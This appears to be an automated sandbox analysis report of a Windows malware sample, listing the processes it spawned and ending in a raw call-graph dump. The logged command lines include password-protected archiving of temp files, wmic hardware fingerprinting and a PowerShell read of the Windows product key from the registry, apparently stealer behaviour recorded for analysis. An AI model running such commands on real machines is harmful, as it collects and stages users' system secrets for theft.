                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:89
                                                                                                                                                                    Start time:09:24:26
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *
Imagebase:0x7ff7d79c0000
File size:630'736 bytes
MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:90
Start time:09:24:27
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:91
Start time:09:24:27
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:92
Start time:09:24:28
Start date:06/12/2023
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic os get Caption
Imagebase:0x7ff7cbec0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:93
Start time:09:24:29
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:94
Start time:09:24:29
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:95
Start time:09:24:29
Start date:06/12/2023
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic computersystem get totalphysicalmemory
Imagebase:0x7ff7cbec0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:96
Start time:09:24:30
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff70f330000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:97
Start time:09:24:30
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:98
Start time:09:24:30
Start date:06/12/2023
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic csproduct get uuid
Imagebase:0x7ff7cbec0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:99
Start time:09:24:31
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:100
Start time:09:24:31
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:101
Start time:09:24:31
Start date:06/12/2023
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Has exited:true

Target ID:102
Start time:09:24:32
Start date:06/12/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:0x7ff784dd0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:103
Start time:09:24:32
Start date:06/12/2023
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:104
                                                                                                                                                                    Start time:09:24:32
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:105
                                                                                                                                                                    Start time:09:24:33
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:106
                                                                                                                                                                    Start time:09:24:33
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:107
                                                                                                                                                                    Start time:09:24:33
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true


Execution Graph

Execution Coverage: 12%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 71
execution_graph: node and edge data of the interactive call-graph viewer (function addresses in the 0x7ff6313d0000 image range with their CRT helper names, e.g. _wfindfirst32i64, _get_daylight, _invalid_parameter_noinfo, __scrt_acquire_startup_lock). Windows API calls named in the graph: FindFirstFileExW, FindNextFileW, GetLastError, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, FlsGetValue, FlsSetValue, SetLastError, RtlAllocateHeap, RtlDeleteBoundaryDescriptor, TlsFree, LoadLibraryExW, FreeLibrary, GetProcAddress, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleW, GetModuleFileNameW, GetStartupInfoW, InitializeSListHead, WideCharToMultiByte, MultiByteToWideChar, GetEnvironmentVariableW, ExpandEnvironmentStringsW, SetEnvironmentVariableW, SetDllDirectoryW, MessageBoxA, MessageBoxW.
_wfindfirst32i64 8 API calls 15935->15936 15938 7ff6313d3bca 15936->15938 15939 7ff6313d4000 49 API calls 15937->15939 15938->15581 15943 7ff6313d6520 15938->15943 15939->15935 15940->15927 15942 7ff6313d2ad0 59 API calls 15941->15942 15942->15935 18033 7ff6313d8210 15943->18033 15945 7ff6313d653c 15946 7ff6313d8210 58 API calls 15945->15946 15947 7ff6313d654f 15946->15947 15948 7ff6313d6585 15947->15948 15949 7ff6313d6567 15947->15949 15950 7ff6313d2ad0 59 API calls 15948->15950 18037 7ff6313d6ea0 GetProcAddress 15949->18037 15960 7ff6313d1eb5 15959->15960 15961 7ff6313e4a74 49 API calls 15960->15961 15962 7ff6313d1ed8 15961->15962 15962->15586 18096 7ff6313d5b70 15963->18096 15966 7ff6313d345d 15966->15594 16016 7ff6313dbc10 15997->16016 16000 7ff6313d29c9 16018 7ff6313e4a74 16000->16018 16005 7ff6313d1e90 49 API calls 16006 7ff6313d2a26 memcpy_s 16005->16006 16007 7ff6313d8a90 54 API calls 16006->16007 16008 7ff6313d2a5b 16007->16008 16009 7ff6313d2a60 16008->16009 16010 7ff6313d2a98 MessageBoxA 16008->16010 16011 7ff6313d8a90 54 API calls 16009->16011 16012 7ff6313d2ab2 16010->16012 16013 7ff6313d2a7a MessageBoxW 16011->16013 16014 7ff6313dbc70 _wfindfirst32i64 8 API calls 16012->16014 16013->16012 16015 7ff6313d2ac2 16014->16015 16015->15735 16017 7ff6313d299c GetLastError 16016->16017 16017->16000 16022 7ff6313e4ace 16018->16022 16019 7ff6313e4af3 16020 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16019->16020 16035 7ff6313e4b1d 16020->16035 16021 7ff6313e4b2f 16048 7ff6313e2d00 16021->16048 16022->16019 16022->16021 16025 7ff6313e4c0c 16027 7ff6313eadbc __free_lconv_mon 11 API calls 16025->16027 16026 7ff6313dbc70 _wfindfirst32i64 8 API calls 16028 7ff6313d29f7 16026->16028 16027->16035 16036 7ff6313d8510 16028->16036 16029 7ff6313e4be1 16032 7ff6313eadbc __free_lconv_mon 11 API calls 16029->16032 16030 7ff6313e4c30 16030->16025 16031 7ff6313e4c3a 16030->16031 16034 7ff6313eadbc __free_lconv_mon 11 API calls 16031->16034 16032->16035 16033 
7ff6313e4bd8 16033->16025 16033->16029 16034->16035 16035->16026 16037 7ff6313d851c 16036->16037 16038 7ff6313d853d FormatMessageW 16037->16038 16039 7ff6313d8537 GetLastError 16037->16039 16040 7ff6313d8570 16038->16040 16041 7ff6313d858c WideCharToMultiByte 16038->16041 16039->16038 16042 7ff6313d2980 54 API calls 16040->16042 16043 7ff6313d8583 16041->16043 16044 7ff6313d85c6 16041->16044 16042->16043 16046 7ff6313dbc70 _wfindfirst32i64 8 API calls 16043->16046 16045 7ff6313d2980 54 API calls 16044->16045 16045->16043 16047 7ff6313d29fe 16046->16047 16047->16005 16049 7ff6313e2d3e 16048->16049 16054 7ff6313e2d2e 16048->16054 16050 7ff6313e2d47 16049->16050 16058 7ff6313e2d75 16049->16058 16051 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16050->16051 16053 7ff6313e2d6d 16051->16053 16052 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16052->16053 16053->16025 16053->16029 16053->16030 16053->16033 16054->16052 16057 7ff6313e3024 16060 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16057->16060 16058->16053 16058->16054 16058->16057 16062 7ff6313e3690 16058->16062 16088 7ff6313e3358 16058->16088 16118 7ff6313e2be0 16058->16118 16121 7ff6313e48b0 16058->16121 16060->16054 16063 7ff6313e36d2 16062->16063 16064 7ff6313e3745 16062->16064 16065 7ff6313e376f 16063->16065 16066 7ff6313e36d8 16063->16066 16067 7ff6313e379f 16064->16067 16068 7ff6313e374a 16064->16068 16145 7ff6313e1c40 16065->16145 16073 7ff6313e36dd 16066->16073 16079 7ff6313e37ae 16066->16079 16067->16065 16067->16079 16086 7ff6313e3708 16067->16086 16069 7ff6313e377f 16068->16069 16070 7ff6313e374c 16068->16070 16152 7ff6313e1830 16069->16152 16072 7ff6313e36ed 16070->16072 16078 7ff6313e375b 16070->16078 16087 7ff6313e37dd 16072->16087 16127 7ff6313e3ff4 16072->16127 16073->16072 16076 7ff6313e3720 16073->16076 16073->16086 16076->16087 16137 7ff6313e44b0 16076->16137 16078->16065 16081 7ff6313e3760 16078->16081 16079->16087 16159 7ff6313e2050 16079->16159 16081->16087 16141 
7ff6313e4648 16081->16141 16082 7ff6313dbc70 _wfindfirst32i64 8 API calls 16084 7ff6313e3a73 16082->16084 16084->16058 16086->16087 16166 7ff6313eecc8 16086->16166 16087->16082 16089 7ff6313e3363 16088->16089 16090 7ff6313e3379 16088->16090 16091 7ff6313e33b7 16089->16091 16092 7ff6313e36d2 16089->16092 16093 7ff6313e3745 16089->16093 16090->16091 16094 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16090->16094 16091->16058 16095 7ff6313e376f 16092->16095 16096 7ff6313e36d8 16092->16096 16097 7ff6313e379f 16093->16097 16098 7ff6313e374a 16093->16098 16094->16091 16101 7ff6313e1c40 38 API calls 16095->16101 16105 7ff6313e36dd 16096->16105 16107 7ff6313e37ae 16096->16107 16097->16095 16097->16107 16116 7ff6313e3708 16097->16116 16099 7ff6313e377f 16098->16099 16100 7ff6313e374c 16098->16100 16103 7ff6313e1830 38 API calls 16099->16103 16102 7ff6313e36ed 16100->16102 16109 7ff6313e375b 16100->16109 16101->16116 16104 7ff6313e3ff4 47 API calls 16102->16104 16117 7ff6313e37dd 16102->16117 16103->16116 16104->16116 16105->16102 16106 7ff6313e3720 16105->16106 16105->16116 16110 7ff6313e44b0 47 API calls 16106->16110 16106->16117 16108 7ff6313e2050 38 API calls 16107->16108 16107->16117 16108->16116 16109->16095 16111 7ff6313e3760 16109->16111 16110->16116 16113 7ff6313e4648 37 API calls 16111->16113 16111->16117 16112 7ff6313dbc70 _wfindfirst32i64 8 API calls 16114 7ff6313e3a73 16112->16114 16113->16116 16114->16058 16115 7ff6313eecc8 47 API calls 16115->16116 16116->16115 16116->16117 16117->16112 16315 7ff6313e0e04 16118->16315 16122 7ff6313e48c7 16121->16122 16332 7ff6313ede28 16122->16332 16128 7ff6313e4016 16127->16128 16176 7ff6313e0c70 16128->16176 16133 7ff6313e4153 16135 7ff6313e41dc 16133->16135 16136 7ff6313e48b0 45 API calls 16133->16136 16134 7ff6313e48b0 45 API calls 16134->16133 16135->16086 16136->16135 16138 7ff6313e4530 16137->16138 16139 7ff6313e44c8 16137->16139 16138->16086 16139->16138 16140 7ff6313eecc8 47 API calls 16139->16140 16140->16138 
16143 7ff6313e4669 16141->16143 16142 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16144 7ff6313e469a 16142->16144 16143->16142 16143->16144 16144->16086 16146 7ff6313e1c73 16145->16146 16147 7ff6313e1ca2 16146->16147 16149 7ff6313e1d5f 16146->16149 16148 7ff6313e0c70 12 API calls 16147->16148 16151 7ff6313e1cdf 16147->16151 16148->16151 16150 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16149->16150 16150->16151 16151->16086 16153 7ff6313e1863 16152->16153 16154 7ff6313e1892 16153->16154 16156 7ff6313e194f 16153->16156 16155 7ff6313e0c70 12 API calls 16154->16155 16158 7ff6313e18cf 16154->16158 16155->16158 16157 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16156->16157 16157->16158 16158->16086 16160 7ff6313e2083 16159->16160 16161 7ff6313e20b2 16160->16161 16164 7ff6313e216f 16160->16164 16162 7ff6313e20ef 16161->16162 16163 7ff6313e0c70 12 API calls 16161->16163 16162->16086 16163->16162 16165 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16164->16165 16165->16162 16167 7ff6313eecf0 16166->16167 16168 7ff6313e48b0 45 API calls 16167->16168 16169 7ff6313eed35 16167->16169 16172 7ff6313eecf5 memcpy_s 16167->16172 16174 7ff6313eed1e memcpy_s 16167->16174 16168->16169 16169->16172 16169->16174 16312 7ff6313f0378 16169->16312 16170 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16170->16172 16172->16086 16174->16170 16174->16172 16177 7ff6313e0c96 16176->16177 16178 7ff6313e0ca7 16176->16178 16184 7ff6313ee9e0 16177->16184 16178->16177 16179 7ff6313eda6c _fread_nolock 12 API calls 16178->16179 16180 7ff6313e0cd4 16179->16180 16181 7ff6313e0ce8 16180->16181 16182 7ff6313eadbc __free_lconv_mon 11 API calls 16180->16182 16183 7ff6313eadbc __free_lconv_mon 11 API calls 16181->16183 16182->16181 16183->16177 16185 7ff6313eea30 16184->16185 16186 7ff6313ee9fd 16184->16186 16185->16186 16188 7ff6313eea62 16185->16188 16187 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16186->16187 16196 7ff6313e4131 16187->16196 16194 7ff6313eeb75 
16188->16194 16201 7ff6313eeaaa 16188->16201 16189 7ff6313eec67 16239 7ff6313edecc 16189->16239 16191 7ff6313eec2d 16232 7ff6313ee264 16191->16232 16193 7ff6313eebfc 16225 7ff6313ee544 16193->16225 16194->16189 16194->16191 16194->16193 16195 7ff6313eebbf 16194->16195 16198 7ff6313eebb5 16194->16198 16215 7ff6313ee774 16195->16215 16196->16133 16196->16134 16198->16191 16200 7ff6313eebba 16198->16200 16200->16193 16200->16195 16201->16196 16206 7ff6313ea8ec 16201->16206 16204 7ff6313ead74 _wfindfirst32i64 17 API calls 16205 7ff6313eecc4 16204->16205 16207 7ff6313ea903 16206->16207 16208 7ff6313ea8f9 16206->16208 16209 7ff6313e52d4 _get_daylight 11 API calls 16207->16209 16208->16207 16210 7ff6313ea91e 16208->16210 16214 7ff6313ea90a 16209->16214 16212 7ff6313ea916 16210->16212 16213 7ff6313e52d4 _get_daylight 11 API calls 16210->16213 16211 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16211->16212 16212->16196 16212->16204 16213->16214 16214->16211 16248 7ff6313f45cc 16215->16248 16219 7ff6313ee81c 16220 7ff6313ee871 16219->16220 16222 7ff6313ee83c 16219->16222 16224 7ff6313ee820 16219->16224 16301 7ff6313ee360 16220->16301 16297 7ff6313ee61c 16222->16297 16224->16196 16226 7ff6313f45cc 38 API calls 16225->16226 16227 7ff6313ee58e 16226->16227 16228 7ff6313f4014 37 API calls 16227->16228 16229 7ff6313ee5de 16228->16229 16230 7ff6313ee5e2 16229->16230 16231 7ff6313ee61c 45 API calls 16229->16231 16230->16196 16231->16230 16233 7ff6313f45cc 38 API calls 16232->16233 16234 7ff6313ee2af 16233->16234 16235 7ff6313f4014 37 API calls 16234->16235 16236 7ff6313ee307 16235->16236 16237 7ff6313ee30b 16236->16237 16238 7ff6313ee360 45 API calls 16236->16238 16237->16196 16238->16237 16240 7ff6313edf44 16239->16240 16241 7ff6313edf11 16239->16241 16243 7ff6313edf5c 16240->16243 16245 7ff6313edfdd 16240->16245 16242 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16241->16242 16247 7ff6313edf3d memcpy_s 16242->16247 16244 7ff6313ee264 46 API calls 16243->16244 
16244->16247 16246 7ff6313e48b0 45 API calls 16245->16246 16245->16247 16246->16247 16247->16196 16249 7ff6313f461f fegetenv 16248->16249 16250 7ff6313f852c 37 API calls 16249->16250 16253 7ff6313f4672 16250->16253 16251 7ff6313f469f 16255 7ff6313ea8ec __std_exception_copy 37 API calls 16251->16255 16252 7ff6313f4762 16254 7ff6313f852c 37 API calls 16252->16254 16253->16252 16258 7ff6313f473c 16253->16258 16259 7ff6313f468d 16253->16259 16256 7ff6313f478c 16254->16256 16257 7ff6313f471d 16255->16257 16260 7ff6313f852c 37 API calls 16256->16260 16262 7ff6313f5844 16257->16262 16267 7ff6313f4725 16257->16267 16263 7ff6313ea8ec __std_exception_copy 37 API calls 16258->16263 16259->16251 16259->16252 16261 7ff6313f479d 16260->16261 16264 7ff6313f8720 20 API calls 16261->16264 16265 7ff6313ead74 _wfindfirst32i64 17 API calls 16262->16265 16263->16257 16275 7ff6313f4806 memcpy_s 16264->16275 16266 7ff6313f5859 16265->16266 16268 7ff6313dbc70 _wfindfirst32i64 8 API calls 16267->16268 16269 7ff6313ee7c1 16268->16269 16293 7ff6313f4014 16269->16293 16270 7ff6313f4baf memcpy_s 16271 7ff6313f4847 memcpy_s 16289 7ff6313f4ca3 memcpy_s 16271->16289 16290 7ff6313f518b memcpy_s 16271->16290 16272 7ff6313f4eef 16273 7ff6313f4130 37 API calls 16272->16273 16279 7ff6313f5607 16273->16279 16274 7ff6313f4e9b 16274->16272 16276 7ff6313f585c memcpy_s 37 API calls 16274->16276 16275->16270 16275->16271 16277 7ff6313e52d4 _get_daylight 11 API calls 16275->16277 16276->16272 16278 7ff6313f4c80 16277->16278 16280 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16278->16280 16281 7ff6313f585c memcpy_s 37 API calls 16279->16281 16286 7ff6313f5662 16279->16286 16280->16271 16281->16286 16282 7ff6313f57e8 16284 7ff6313f852c 37 API calls 16282->16284 16283 7ff6313e52d4 11 API calls _get_daylight 16283->16290 16284->16267 16285 7ff6313e52d4 11 API calls _get_daylight 16285->16289 16286->16282 16287 7ff6313f4130 37 API calls 16286->16287 16292 7ff6313f585c memcpy_s 37 API calls 16286->16292 
16287->16286 16288 7ff6313ead54 37 API calls _invalid_parameter_noinfo 16288->16290 16289->16274 16289->16285 16291 7ff6313ead54 37 API calls _invalid_parameter_noinfo 16289->16291 16290->16272 16290->16274 16290->16283 16290->16288 16291->16289 16292->16286 16294 7ff6313f4033 16293->16294 16295 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16294->16295 16296 7ff6313f405e memcpy_s 16294->16296 16295->16296 16296->16219 16298 7ff6313ee648 memcpy_s 16297->16298 16299 7ff6313e48b0 45 API calls 16298->16299 16300 7ff6313ee702 memcpy_s 16298->16300 16299->16300 16300->16224 16302 7ff6313ee39b 16301->16302 16305 7ff6313ee3e8 memcpy_s 16301->16305 16303 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16302->16303 16304 7ff6313ee3c7 16303->16304 16304->16224 16307 7ff6313ee453 16305->16307 16308 7ff6313e48b0 45 API calls 16305->16308 16306 7ff6313ea8ec __std_exception_copy 37 API calls 16311 7ff6313ee495 memcpy_s 16306->16311 16307->16306 16308->16307 16309 7ff6313ead74 _wfindfirst32i64 17 API calls 16310 7ff6313ee540 16309->16310 16311->16309 16313 7ff6313f039c WideCharToMultiByte 16312->16313 16316 7ff6313e0e43 16315->16316 16317 7ff6313e0e31 16315->16317 16320 7ff6313e0e50 16316->16320 16323 7ff6313e0e8d 16316->16323 16318 7ff6313e52d4 _get_daylight 11 API calls 16317->16318 16319 7ff6313e0e36 16318->16319 16321 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16319->16321 16322 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16320->16322 16331 7ff6313e0e41 16321->16331 16322->16331 16324 7ff6313e0f36 16323->16324 16325 7ff6313e52d4 _get_daylight 11 API calls 16323->16325 16326 7ff6313e52d4 _get_daylight 11 API calls 16324->16326 16324->16331 16327 7ff6313e0f2b 16325->16327 16328 7ff6313e0fe0 16326->16328 16329 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16327->16329 16330 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16328->16330 16329->16324 16330->16331 16331->16058 16333 7ff6313ede41 16332->16333 16334 7ff6313e48ef 16332->16334 
16333->16334 16340 7ff6313f3824 16333->16340 16336 7ff6313ede94 16334->16336 16337 7ff6313edead 16336->16337 16339 7ff6313e48ff 16336->16339 16337->16339 16353 7ff6313f2b70 16337->16353 16339->16058 16341 7ff6313eb5c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16340->16341 16342 7ff6313f3833 16341->16342 16343 7ff6313f387e 16342->16343 16352 7ff6313f0b68 EnterCriticalSection 16342->16352 16343->16334 16354 7ff6313eb5c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16353->16354 16355 7ff6313f2b79 16354->16355 16363 7ff6313e517c EnterCriticalSection 16356->16363 16365 7ff6313d284c 16364->16365 16366 7ff6313e4a74 49 API calls 16365->16366 16367 7ff6313d289d 16366->16367 16368 7ff6313e52d4 _get_daylight 11 API calls 16367->16368 16369 7ff6313d28a2 16368->16369 16383 7ff6313e52f4 16369->16383 16372 7ff6313d1e90 49 API calls 16373 7ff6313d28d1 memcpy_s 16372->16373 16374 7ff6313d8a90 57 API calls 16373->16374 16375 7ff6313d2906 16374->16375 16376 7ff6313d2943 MessageBoxA 16375->16376 16377 7ff6313d290b 16375->16377 16379 7ff6313d295d 16376->16379 16378 7ff6313d8a90 57 API calls 16377->16378 16380 7ff6313d2925 MessageBoxW 16378->16380 16381 7ff6313dbc70 _wfindfirst32i64 8 API calls 16379->16381 16380->16379 16382 7ff6313d296d 16381->16382 16382->15745 16384 7ff6313eb738 _get_daylight 11 API calls 16383->16384 16385 7ff6313e530b 16384->16385 16386 7ff6313d28a9 16385->16386 16387 7ff6313ef008 _get_daylight 11 API calls 16385->16387 16390 7ff6313e534b 16385->16390 16386->16372 16388 7ff6313e5340 16387->16388 16389 7ff6313eadbc __free_lconv_mon 11 API calls 16388->16389 16389->16390 16390->16386 16395 7ff6313ef6d8 16390->16395 16393 7ff6313ead74 _wfindfirst32i64 17 API calls 16394 7ff6313e5390 16393->16394 16400 7ff6313ef6f5 16395->16400 16396 7ff6313ef6fa 16397 7ff6313e5371 16396->16397 16398 7ff6313e52d4 _get_daylight 11 API calls 16396->16398 16397->16386 16397->16393 16399 7ff6313ef704 16398->16399 16401 7ff6313ead54 _invalid_parameter_noinfo 37 API 
